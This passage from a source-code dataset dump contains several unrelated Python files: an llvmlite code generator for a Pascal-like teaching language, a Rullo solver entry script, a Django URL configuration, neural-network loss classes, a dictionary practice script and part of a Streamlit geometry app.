addr])\n\n if len(self.symbol_table.tables) > 1:\n addr = self.builder.alloca(const_v.type)\n self.builder.store(const_v, addr)\n else:\n addr = ir.GlobalVariable(self.module, const_v.type, name)\n try:\n if const_v.type.intrinsic_name == 'i32':\n addr.initializer = ir.Constant(ir.IntType(32), int(const_v.constant))\n elif const_v.type.intrinsic_name == 'f64':\n addr.initializer = ir.Constant(ir.DoubleType(), float(const_v.constant))\n elif const_v.type.intrinsic_name == 'i8':\n addr.initializer = ir.Constant(ir.IntType(8), int(const_v.constant))\n except AttributeError:\n addr.initializer = const_v\n addr.global_constant = True\n\n self.symbol_table.insert([name, addr])\n\n if len(node.children) == 5:\n self._codegen(node.children[0])\n\n def const_value(self, node):\n t = node.children[0].type\n value = node.children[0].name\n if t in type_t.keys():\n ir_type = type_t[t]\n if ir_type.intrinsic_name == 'i8':\n value = ord(value[1])\n const_v = ir.Constant(ir_type, value)\n return const_v\n else:\n value = bytes(value.strip('\"'), encoding='utf-8').decode('unicode-escape')\n value += '\\0'\n c_str = 
ir.Constant(ir.ArrayType(ir.IntType(8), len(value)), bytearray(value.encode(\"utf8\")))\n return c_str\n\n def type_part(self, node):\n self._codegen(node.children[-1])\n\n def var_part(self, node):\n self._codegen(node.children[-1])\n\n def var_decl_list(self, node):\n for n in node.children:\n self._codegen(n)\n\n def type_decl_list(self, node):\n for n in node.children:\n self._codegen(n)\n\n def var_decl(self, node):\n namelist = self.name_list(node.children[0])\n if (node.children[2].children[0].type == \"simple_type_decl\"):\n ir_type = self.type_decl(node.children[2])\n for name in namelist:\n # addr = self.builder.alloca(ir_type)\n # # addr = ir.GlobalVariable(self.module, ir_type, node.children[0].children[0].name)\n # # addr.initializer = ir.Constant(ir.IntType(32), 0)\n # self.symbol_table.insert([name, addr])\n if len(self.symbol_table.tables) > 1:\n addr = self.builder.alloca(ir_type)\n else:\n addr = ir.GlobalVariable(self.module, ir_type, name)\n if ir_type.intrinsic_name == 'i32':\n addr.initializer = ir.Constant(ir.IntType(32), 0)\n elif ir_type.intrinsic_name == 'f64':\n addr.initializer = ir.Constant(ir.DoubleType(), 0)\n elif ir_type.intrinsic_name == 'i8':\n addr.initializer = ir.Constant(ir.IntType(8), 0)\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"array_type_decl\"):\n array_list = self.type_decl(node.children[2])\n array_type = ir.ArrayType(array_list[1], int(array_list[2]) + 1) # x integers of element\n for name in namelist:\n addr = self.builder.alloca(array_type) # pointer to array\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"record_type_decl\"):\n field_list = self.type_decl(node.children[2])\n i32 = ir.IntType(32)\n for name in namelist:\n field_body = [i32]\n count = 1\n for f in field_list[1]:\n field_body += [f[1]]\n index = ir.Constant(i32, count)\n try:\n self.symbol_table.insert([name + \".\" + f[0], index], 0)\n except MultiDefinedError as error:\n pass\n count += 1\n str_list = ir.LiteralStructType(field_body)\n addr = self.builder.alloca(str_list) # pointer to array\n self.symbol_table.insert([name, addr])\n\n def type_definition(self, node):\n name = node.children[0].name\n if (node.children[2].children[0].type == \"array_type_decl\"):\n array_list = self.type_decl(node.children[2])\n array_type = ir.ArrayType(array_list[1], int(array_list[2])+1) # x integers of element\n addr = self.builder.alloca(array_type) # pointer to array\n self.symbol_table.insert([name, addr])\n elif (node.children[2].children[0].type == \"record_type_decl\"):\n field_list = self.type_decl(node.children[2])\n i32 = ir.IntType(32)\n field_body = [i32]\n count = 1\n for f in field_list[1]:\n field_body += [f[1]]\n index = ir.Constant(i32, count)\n self.symbol_table.insert([name + \".\" + f[0], index])\n count += 1\n str_list = ir.LiteralStructType(field_body)\n addr = self.builder.alloca(str_list) # pointer to array\n self.symbol_table.insert([name, addr])\n\n\n def name_list(self, node):\n if len(node.children) > 1:\n namelist = self.name_list(node.children[0])\n else:\n namelist = []\n name = [node.children[-1].name]\n return namelist + name\n\n def type_decl(self, node):\n if node.children[0].type == \"simple_type_decl\":\n return self.simple_type_decl(node.children[0])\n elif node.children[0].type == \"array_type_decl\":\n return self.array_type_decl(node.children[0])\n elif node.children[0].type == \"record_type_decl\":\n return self.record_type_decl(node.children[0])\n\n def 
simple_type_decl(self, node):\n if node.children[0].type == \"SYS_TYPE\":\n spl_type = node.children[0].name.upper()\n ir_type = type_t[spl_type]\n return ir_type\n\n def array_type_decl(self, node):\n if node.children[2].children[0].children[0].name == \"1\":\n spl_type = node.children[5].children[0].children[0].name.upper()\n ir_type = type_t[spl_type]\n return [\"array\", ir_type, node.children[2].children[2].children[0].name]\n else:\n raise SplTypeError([\"Cannot create array\"])\n\n def record_type_decl(self, node):\n return [\"record\", self._codegen(node.children[1])]\n\n def field_decl_list(self, node):\n field_list = []\n for n in node.children:\n field_list +=self._codegen(n)\n return field_list\n\n def field_decl(self, node):\n namelist = self.name_list(node.children[0])\n ir_type = self.type_decl(node.children[2])\n field_list = []\n for name in namelist:\n field_list += [[name, ir_type]]\n return field_list\n\n def routine_part(self, node):\n for n in node.children:\n self._codegen(n)\n\n def procedure_decl(self, node):\n name, paralist = self.procedure_head(node.children[0])\n namelist = []\n ir_type_list = []\n for t in paralist:\n if t[0][0] == \"var\":\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1].as_pointer())\n namelist.append((\"var\", t[0][i]))\n else:\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1])\n namelist.append((\"val\", t[0][i]))\n\n\n func_type = ir.FunctionType(ir.VoidType(), ir_type_list)\n func = ir.Function(self.module, func_type, name=name)\n self.symbol_table.insert([name, func])\n self.symbol_table.create_tab()\n\n stored_builder = self.builder\n block = func.append_basic_block(name=name)\n self.builder = ir.IRBuilder(block)\n\n func_args = func.args\n for i in range(len(func_args)):\n if namelist[i][0] == \"val\":\n addr = self.builder.alloca(ir_type_list[i])\n self.builder.store(func_args[i], addr)\n self.symbol_table.insert([namelist[i][1], addr])\n if namelist[i][0] == \"var\":\n addr = func_args[i]\n self.symbol_table.insert([namelist[i][1], addr])\n\n self.subroutine(node.children[2])\n self.builder.ret_void()\n self.builder = stored_builder\n self.symbol_table.pop()\n\n def procedure_head(self, node):\n name = node.children[1].name\n paralist = self._codegen(node.children[2]) # [(['a'], (ir_type, spl_type))]\n return name, paralist # name(str), paralist([(paraname_list, irtype), ..]), ret(type)\n\n def function_decl(self, node):\n name, paralist, ret = self.function_head(node.children[0])\n namelist = []\n ir_type_list = []\n for t in paralist:\n if t[0][0] == \"var\":\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1].as_pointer())\n namelist.append((\"var\", t[0][i]))\n else:\n for i in range(1, len(t[0])):\n ir_type_list.append(t[1])\n namelist.append((\"val\", t[0][i]))\n\n ret_ir_type = type_t[node.children[0].children[-1].children[0].name.upper()]\n\n func_type = ir.FunctionType(ret_ir_type, ir_type_list)\n func = ir.Function(self.module, func_type, name=name)\n self.symbol_table.insert([name, func])\n self.symbol_table.create_tab()\n\n stored_builder = self.builder\n block = func.append_basic_block(name=name)\n self.builder = ir.IRBuilder(block)\n\n retaddr = self.builder.alloca(ret_ir_type)\n self.symbol_table.insert([name+\"_return\", retaddr])\n\n func_args = func.args\n for i in range(len(func_args)):\n if namelist[i][0] == \"val\":\n addr = self.builder.alloca(ir_type_list[i])\n self.builder.store(func_args[i], addr)\n self.symbol_table.insert([namelist[i][1], addr])\n if namelist[i][0] == \"var\":\n 
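# 'var' parameters are passed by reference: the caller's pointer argument is reused as the local address, so assignments through it write back to the caller's variable.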
addr = func_args[i]\n self.symbol_table.insert([namelist[i][1], addr])\n\n self.subroutine(node.children[2])\n retval = self.builder.load(retaddr)\n self.builder.ret(retval)\n\n self.builder = stored_builder\n self.symbol_table.pop()\n\n def function_head(self, node):\n name = node.children[1].name\n paralist = self._codegen(node.children[2]) # [(['a'], (ir_type, spl_type))]\n ret = self._codegen(node.children[4])\n return name, paralist, ret # name(str), paralist([(paraname_list, irtype), ..]), ret(type)\n\n def parameters(self, node):\n return self._codegen(node.children[1])\n\n def para_decl_list(self, node):\n if len(node.children) > 1:\n pre_list = self.para_decl_list(node.children[0])\n else:\n pre_list = []\n paralist = pre_list + [self.para_type_list(node.children[-1])]\n return paralist\n\n def para_type_list(self, node): # (paraname_list, ir_type)\n paraname_list = self._codegen(node.children[0]) # val_para_list only [str, ..]\n ir_type = self._codegen(node.children[-1])\n if node.children[0].type == \"var_para_list\":\n paraname_list.insert(0, \"var\")\n else:\n paraname_list.insert(0, \"val\")\n return paraname_list, ir_type\n\n def val_para_list(self, node):\n return self._codegen(node.children[0])\n\n def var_para_list(self, node):\n return self._codegen(node.children[1])\n\n def routine_body(self, node):\n self.compound_stmt(node.children[0])\n\n def compound_stmt(self, node):\n self.stmt_list(node.children[1])\n\n def stmt_list(self, node):\n if len(node.children) > 1:\n self._codegen(node.children[0])\n self._codegen(node.children[1])\n else:\n self.epsilon(node.children[0])\n\n def stmt(self, node):\n self._codegen(node.children[-1])\n\n def non_label_stmt(self, node):\n self._codegen(node.children[0])\n\n def assign_stmt(self, node):\n if node.children[1].type == \"ASSIGN\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[2])\n\n if type(lhs) == ir.Function:\n # self.builder.ret(rhs)\n lhs = self.symbol_table.find(name+'_return')['entry']\n self.builder.store(rhs, lhs)\n else:\n if str(lhs.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(lhs.type)[:-1])])\n self.builder.store(rhs, lhs)\n elif node.children[1].type == \"LB\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[5])\n index = self.expression(node.children[2])\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, index]) # gets address of array[0]\n if str(pointer_to_index.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(pointer_to_index.type)[:-1])])\n self.builder.store(rhs, pointer_to_index)\n elif node.children[1].type == \"DOT\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n rhs = self.expression(node.children[4])\n index = node.children[2].name\n offset = self.symbol_table.find(name + \".\" + index)[\"entry\"]\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, offset]) # gets address of array[0]\n if str(pointer_to_index.type)[:-1] != str(rhs.type):\n raise SplTypeError([\"Cannot assign %s to %s\" % (str(rhs.type), str(pointer_to_index.type)[:-1])])\n self.builder.store(rhs, pointer_to_index)\n\n def proc_stmt(self, node):\n if node.children[0].type == 'READ':\n addr = self.symbol_table.find(node.children[2].children[0].name)['entry']\n 
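# READ is lowered to a call to libc scanf: build a format specifier from the target variable's pointee type, declare scanf once per module, then pass the variable's address as the output argument.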
python_sca = \"\"\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n scanf = self.module.globals.get('scanf', None)\n if not scanf:\n scanf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n scanf = ir.Function(self.module, scanf_ty, name=\"scanf\")\n if addr.type.pointee.intrinsic_name == 'i32':\n python_sca = python_sca + '%d\\0'\n elif addr.type.pointee.intrinsic_name == 'f64':\n python_sca = python_sca + '%f\\0'\n elif addr.type.pointee.intrinsic_name == 'i8':\n python_sca = python_sca + '%c\\0'\n else:\n python_sca = python_sca + '%s\\0'\n fmt_sca = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_sca)), bytearray(python_sca.encode(\"utf8\")))\n global_sca = ir.GlobalVariable(self.module, fmt_sca.type, name='sca'+ran)\n global_sca.linkage = 'internal'\n global_sca.global_constant = True\n global_sca.initializer = fmt_sca\n sca_arg = self.builder.bitcast(global_sca, voidptr_ty)\n self.builder.call(scanf, [sca_arg, addr])\n self.builder.load(addr)\n return\n\n args = self.args_list(node.children[2])\n if node.children[0].name == 'write':\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n printf = self.module.globals.get('printf', None)\n if not printf:\n printf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n printf = ir.Function(self.module, printf_ty, name=\"printf\")\n python_str = \"SPL >> \"\n for i in args:\n if i.type.intrinsic_name == 'i32':\n python_str = python_str + \"%d \"\n elif i.type.intrinsic_name == 'f64':\n python_str = python_str + \"%f \"\n else:\n python_str = python_str + \"%s \"\n python_str = python_str + \"\\0\"\n fmt_str = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_str)), bytearray(python_str.encode(\"utf8\")))\n global_fmt = ir.GlobalVariable(self.module, fmt_str.type, name='fmt'+ran)\n global_fmt.linkage = 'internal'\n global_fmt.global_constant = True\n global_fmt.initializer = fmt_str\n fmt_arg = self.builder.bitcast(global_fmt, voidptr_ty)\n self.builder.call(printf, [fmt_arg] + args)\n\n elif node.children[0].name == 'writeln':\n ran = str(randint(0, 0x7FFFFFFF))\n voidptr_ty = ir.IntType(8).as_pointer()\n printf = self.module.globals.get('printf', None)\n if not printf:\n printf_ty = ir.FunctionType(ir.IntType(32), [voidptr_ty], var_arg=True)\n printf = ir.Function(self.module, printf_ty, name=\"printf\")\n python_str = \"SPL >> \"\n for i in args:\n if i.type.intrinsic_name == 'i32':\n python_str = python_str + \"%d \"\n elif i.type.intrinsic_name == 'f64':\n python_str = python_str + \"%f \"\n else:\n python_str = python_str + \"%s \"\n python_str = python_str + \"\\n\\0\"\n fmt_str = ir.Constant(ir.ArrayType(ir.IntType(8), len(python_str)), bytearray(python_str.encode(\"utf8\")))\n global_fmt = ir.GlobalVariable(self.module, fmt_str.type, name='fmt'+ran)\n global_fmt.linkage = 'internal'\n global_fmt.global_constant = True\n global_fmt.initializer = fmt_str\n fmt_arg = self.builder.bitcast(global_fmt, voidptr_ty)\n self.builder.call(printf, [fmt_arg] + args)\n\n\n else:\n args = self.args_list(node.children[2])\n func = self.symbol_table.find(node.children[0].name)[\"entry\"]\n args_type = func.args\n for i in range(len(args_type)):\n if args_type[i].type.is_pointer:\n args[i] = self.find_addr(node.children[2], len(args) - i - 1)\n return self.builder.call(func, args)\n\n def find_addr(self, node, n):\n cur = node\n for i in range(n):\n cur = cur.children[0]\n return 
self.symbol_table.find(cur.children[-1].children[-1].children[-1].children[-1].children[-1].name)['entry']\n\n def if_stmt(self, node):\n pred = self._codegen(node.children[1])\n with self.builder.if_else(pred) as (then, otherwise):\n with then:\n # stored_builder = self.builder\n # block = self.builder.append_basic_block(\"then_\"+str(ran))\n # self.builder = ir.IRBuilder(block)\n # self.builder.goto_block(then)\n self._codegen(node.children[3])\n # self.builder = stored_builder\n with otherwise:\n # stored_builder = self.builder\n # block = self.builder.append_basic_block(\"else_\" + str(ran))\n # self.builder = ir.IRBuilder(block)\n self._codegen(node.children[4])\n # self.builder = stored_builder\n\n def else_clause(self, node):\n if len(node.children) > 1:\n self._codegen(node.children[-1])\n else:\n return\n\n def repeat_stmt(self, node):\n pass\n\n def case_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n expr = self._codegen(node.children[1])\n othercase = self._codegen(node.children[3])\n default = self.builder.append_basic_block('default_'+ran)\n self.default = default\n case_part = self.builder.switch(expr, default)\n for val, block in othercase:\n case_part.add_case(val, block)\n builder = ir.IRBuilder(block)\n builder.position_at_end(block)\n builder.branch(self.default)\n self.builder.position_at_end(default)\n\n def case_expr_list(self, node):\n if len(node.children) > 1:\n return self._codegen(node.children[0]) + [self._codegen(node.children[1])]\n else:\n return [self._codegen(node.children[0])]\n\n def case_expr(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n val = self._codegen(node.children[0])\n block = self.builder.append_basic_block('case_'+ran)\n stored_builder = self.builder\n self.builder = ir.IRBuilder(block)\n self._codegen(node.children[2])\n self.builder = stored_builder\n return val, block\n\n\n\n def while_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n\n whileblock = self.builder.append_basic_block(\"while_\" + ran)\n stmt = self.builder.append_basic_block(\"stmt_\" + ran)\n jumpout = self.builder.append_basic_block(\"jumpout\")\n self.builder.branch(whileblock)\n\n w_builder = ir.IRBuilder(whileblock)\n stored = self.builder\n self.builder = w_builder\n cond = self._codegen(node.children[1])\n self.builder.cbranch(cond, stmt, jumpout)\n s_builder = ir.IRBuilder(stmt)\n self.builder = s_builder\n self._codegen(node.children[3])\n self.builder.branch(whileblock)\n self.builder = stored\n self.builder.position_at_end(jumpout)\n\n def for_stmt(self, node):\n ran = str(randint(0, 0x7FFFFFFF))\n self.symbol_table.create_tab()\n\n addr = self.builder.alloca(ir.IntType(32))\n init_value = self.expression(node.children[3])\n self.symbol_table.insert([node.children[1].name, addr])\n final_value = self.expression(node.children[5])\n self.builder.store(init_value, addr)\n\n forblock = self.builder.append_basic_block(\"for_\" + ran)\n self.builder.branch(forblock)\n f_builder = ir.IRBuilder(forblock)\n\n stmt_block = f_builder.append_basic_block(\"stmt_\" + ran)\n jumpout = f_builder.append_basic_block(\"jumpout_\" + ran)\n\n init_value = f_builder.load(addr)\n direct = node.children[4].children[0].type\n if direct == \"TO\":\n cmp = \">\"\n else:\n cmp = \"<\"\n cond = f_builder.icmp_signed(cmp, init_value, final_value)\n f_builder.cbranch(cond, jumpout, stmt_block)\n stmt_builder = ir.IRBuilder(stmt_block)\n stored_builder = self.builder\n self.builder = stmt_builder\n self._codegen(node.children[-1])\n self.builder = stored_builder\n one = 
ir.IntType(32)(1)\n if direct == \"TO\":\n inc_dec = stmt_builder.add(init_value, one)\n elif direct == \"DOWNTO\":\n inc_dec = stmt_builder.sub(init_value, one)\n else:\n raise NotDefinedError([direct])\n stmt_builder.store(inc_dec, addr)\n stmt_builder.branch(forblock)\n self.builder.position_at_end(jumpout)\n\n self.symbol_table.pop()\n\n def expression(self, node):\n if len(node.children) > 1:\n lhs = self.expression(node.children[0])\n rhs = self.expr(node.children[-1])\n op = node.children[1].name\n if op == \"<>\":\n op = \"!=\"\n elif op == \"=\":\n op = \"==\"\n else:\n pass\n if lhs.type == rhs.type:\n if lhs.type == ir.IntType(32):\n return self.builder.icmp_signed(op, lhs, rhs)\n elif lhs.type == ir.DoubleType():\n return self.builder.fcmp_ordered(op, lhs, rhs)\n else:\n raise SplTypeError([\"None type %s\" % (lhs.type)])\n else:\n raise SplTypeError([\"types not equal %s ≠ %s\" % (lhs.type, rhs.type)])\n elif len(node.children) == 1:\n return self.expr(node.children[-1])\n else:\n raise ExpressionError([\"Expression error Num %d\" % (len(node.children))])\n\n def expr(self, node):\n if len(node.children) > 1:\n lhs = self._codegen(node.children[0])\n rhs = self._codegen(node.children[2])\n op = node.children[1].type\n if lhs.type != rhs.type:\n raise SplTypeError([\"types not equal %s ≠ %s\" % (lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"INTEGER\"]:\n if op == \"PLUS\":\n # constant fold only when both operands are literal constants\n if isinstance(lhs, ir.Constant) and isinstance(rhs, ir.Constant):\n return ir.Constant(ir.IntType(32), int(lhs.constant) + int(rhs.constant))\n return self.builder.add(lhs, rhs)\n elif op == \"MINUS\":\n return self.builder.sub(lhs, rhs)\n elif op == \"OR\":\n return self.builder.or_(lhs, rhs)\n elif op == \"AND\":\n return self.builder.and_(lhs, rhs)\n elif op == \"MUL\":\n return self.builder.mul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.sdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.urem(lhs, rhs)\n else:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"REAL\"]:\n if op == \"PLUS\":\n return self.builder.fadd(lhs, rhs)\n elif op == \"MINUS\":\n return self.builder.fsub(lhs, rhs)\n elif op == \"MUL\":\n return self.builder.fmul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.fdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.frem(lhs, rhs)\n else:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n elif lhs.type == ir_type_t[\"BOOLEAN\"]:\n if op == \"OR\":\n return self.builder.or_(lhs, rhs)\n elif op == \"AND\":\n return self.builder.and_(lhs, rhs)\n else:\n raise OpError([\"Error Operation %s\" % (op)])\n else:\n raise SplTypeError([\"None type %s\" % (lhs.type)])\n else:\n return self._codegen(node.children[0])\n\n def term(self, node):\n if len(node.children) > 1:\n lhs = self._codegen(node.children[0])\n rhs = self._codegen(node.children[2])\n op = node.children[1].type\n if lhs.type != rhs.type:\n raise SplTypeError([\"%s on two different types, %s and %s\" % (op, lhs.type, rhs.type)])\n if lhs.type == ir_type_t[\"INTEGER\"]:\n if op == \"MUL\":\n return self.builder.mul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.sdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.urem(lhs, rhs)\n else:\n raise OpError([\"Undefined op %s\" % op])\n elif lhs.type == ir_type_t[\"REAL\"]:\n if op == \"MUL\":\n return self.builder.fmul(lhs, rhs)\n elif op == \"DIV\":\n return self.builder.fdiv(lhs, rhs)\n elif op == \"MOD\":\n return self.builder.frem(lhs, rhs)\n 
else:\n raise OpError([\"Undefined op %s\" % op])\n else:\n raise OpError([\"Error Operation %s\" % (op)])\n else:\n return self._codegen(node.children[0])\n\n def factor(self, node):\n if len(node.children) == 1:\n return self._codegen(node.children[0])\n elif len(node.children) == 3:\n if node.children[1].type == \"DOT\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n index = node.children[2].name\n offset = self.symbol_table.find(name + \".\" + index)[\"entry\"]\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, offset]) # gets address of array[0]\n return self.builder.load(pointer_to_index)\n else:\n return self._codegen(node.children[1])\n elif len(node.children) == 4:\n if node.children[1].type == \"LP\":\n args = self.args_list(node.children[2])\n func = self.symbol_table.find(node.children[0].name)[\"entry\"]\n args_type = func.args\n for i in range(len(args_type)):\n if args_type[i].type.is_pointer:\n args[i] = self.find_addr(node.children[2], len(args) - i - 1)\n ret = self.builder.call(func, args)\n return ret\n elif node.children[1].type == \"LB\":\n name = node.children[0].name\n lhs = self.symbol_table.find(name)['entry']\n index = self.expression(node.children[2])\n i32 = ir.IntType(32)\n i32_0 = ir.Constant(i32, 0)\n pointer_to_index = self.builder.gep(lhs, [i32_0, index]) # gets address of array[0]\n return self.builder.load(pointer_to_index)\n\n\n def args_list(self, node):\n if len(node.children) > 1:\n pre_list = self.args_list(node.children[0])\n else:\n pre_list = []\n current = [self._codegen(node.children[-1])]\n return pre_list + current\n\n def NAME(self, node):\n name = node.name\n addr = self.symbol_table.find(name)['entry']\n if type(addr) != ir.Function:\n var = self.builder.load(addr)\n return var\n else:\n # return addr\n addr = self.symbol_table.find(name+'_return')['entry']\n var = self.builder.load(addr)\n return var\n\n def epsilon(self, node):\n pass\n\n","sub_path":"ir_gen.py","file_name":"ir_gen.py","file_ext":"py","file_size_in_byte":33791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"8263700","text":"import argparse\n\nfrom board_factory import BoardFactory\nfrom solver import Solver\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read Rullo board')\n\n parser.add_argument('board', type=str, help='the board file name')\n args = parser.parse_args()\n\n board = BoardFactory.create_board_from_file(args.board)\n solved = Solver.solve(board)\n \n print(board)\n if solved:\n \tprint(\"Done\")\n else:\n \tprint(\"No unique solution\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"65390636","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom project.municipal.views import register, accounts_list, account_create, report, Accounts, Entries, Services\nfrom django.contrib.auth.views import login\nfrom rest_framework import routers\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'accounts', Accounts, base_name='account')\nrouter.register(r'services', Services, base_name='service')\nrouter.register(r'entries', Entries, base_name='entry')\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login/', login, {'template_name': 'login.html'}, name='Login'),\n url(r'^register/', register, name='Register'),\n url(r'^accounts/create/', account_create, name='CreateAccount'),\n url(r'^accounts/(?P\\w+)/report/', report, name='Report'),\n url(r'^accounts/', accounts_list, name='AccountsList'),\n url(r'^api/v1/auth/', include('rest_auth.urls')),\n url(r'^api/v1/', include(router.urls))\n]","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"529055890","text":"from __future__ import division\n\nimport numpy as np\n\nclass Loss(object):\n def loss(self, Y, D):\n raise NotImplementedError\n\n def backward(self, Y, D):\n raise NotImplementedError\n\n\nclass MeanSquareLoss(Loss):\n def loss(self, Y, D):\n P = Y.shape[0]\n delta = D - Y\n error = 1/P * np.sum(delta * delta)\n return error\n\n def backward(self, Y, D):\n P = Y.shape[0]\n dLdy = -2/P * (D - Y)\n return dLdy\n\n\nclass CrossEntropyLoss(Loss):\n def loss(self, Y, D):\n P, M = Y.shape\n if M == 1:\n error = -1/P * np.sum(D*np.log(Y) + (1 - D)*np.log(1 - Y))\n return error\n else:\n raise NotImplementedError\n\n def backward(self, Y, D):\n P, M = Y.shape\n if M == 1:\n dLdy = 1/P * (Y - D) / (Y * (1 - Y))\n return dLdy\n else:\n raise NotImplementedError\n","sub_path":"feedforward/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"443344920","text":"'''\nSome practice with dictionaries\n'''\n\nfrom time import sleep\n\ndevice1 = {\n 'ip_addr':'172.24.1.1',\n 'vendor':'cisco',\n 'username':'user',\n 'password':'superpassword',\n 'platform':'ios'\n}\n\nbgp_fields = {\n 'bgp_as':'25106',\n 'peer_as':'60330',\n 'peer_ip':'192.168.1.1'\n}\n\ndevice1.update(bgp_fields)\n\nprint(\"\\n\\nPrinting keys of the dictionary:\")\nprint(\"-\" * 50)\nsleep(2)\nfor key in device1.keys():\n print(key)\n\nprint(\"\\n\\nPrinting keys and values of the dictionary:\")\nprint(\"-\" * 50)\nsleep(2)\nfor key, value in device1.items():\n print(key + ':', value)\n","sub_path":"kirkbyers/4/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547854842","text":"import streamlit as st\r\nfrom streamlit_option_menu import option_menu\r\nimport math\r\nimport source.title_1 as head\r\ndef Section_1():\r\n head.title()\r\n st.markdown(\"

Problem Statement: Application to Section Formula

\", unsafe_allow_html=True)\r\n st.markdown(\"
\",unsafe_allow_html=True)\r\n w1,col1,col2,col3,w2=st.columns((1,3,2,2,1))\r\n w1,col11,col22,w2=st.columns((1,3,4,1))\r\n us1,bc1,bc2,us2=st.columns((4,3,3,6))\r\n \r\n with col1:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the x1 and y1\")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the x2 and y2\")\r\n with col11:\r\n st.markdown(\"\")\r\n st.write(\"# Enter the m \")\r\n st.markdown(\"### \")\r\n st.write(\"# Enter the n \")\r\n st.markdown(\"### \")\r\n st.write(\"# Select\")\r\n # ------------to create the function to clear the input-----------#\r\n with bc2:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n def clear_text():\r\n st.session_state[\"Clear_sec_x1\"] = 0\r\n st.session_state[\"Clear_sec_x2\"] = 0\r\n st.session_state[\"Clear_sec_y1\"] = 0\r\n st.session_state[\"Clear_sec_y2\"] = 0\r\n st.session_state[\"Clear_sec_m\"] = 0\r\n st.session_state[\"Clear_sec_n\"] = 0\r\n st.button(\"Clear\", on_click=clear_text) \r\n with col2:\r\n vAR_input_x1=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_x1\")\r\n with col3:\r\n vAR_input_y1=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_x2\")\r\n with col2: \r\n vAR_input_x2=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_y1\")\r\n with col3:\r\n vAR_input_y2=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_y2\")\r\n with col22: \r\n vAR_input_m=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_m\")\r\n vAR_input_n=st.number_input(\"\",min_value=0.00,step=1.0,key=\"Clear_sec_n\")\r\n selected=st.selectbox(\"\",[\"Internal Section\",\"External Section\"])\r\n #-----cylinder-------#\r\n with bc1:\r\n st.markdown(\"\")\r\n st.markdown(\"\")\r\n if st.button(\"Submit\"):\r\n with col22:\r\n \r\n if vAR_input_x1 and vAR_input_x2 and vAR_input_m and vAR_input_n and vAR_input_y1 != 0:\r\n if selected == \"Internal Section\":\r\n vAR_dis = 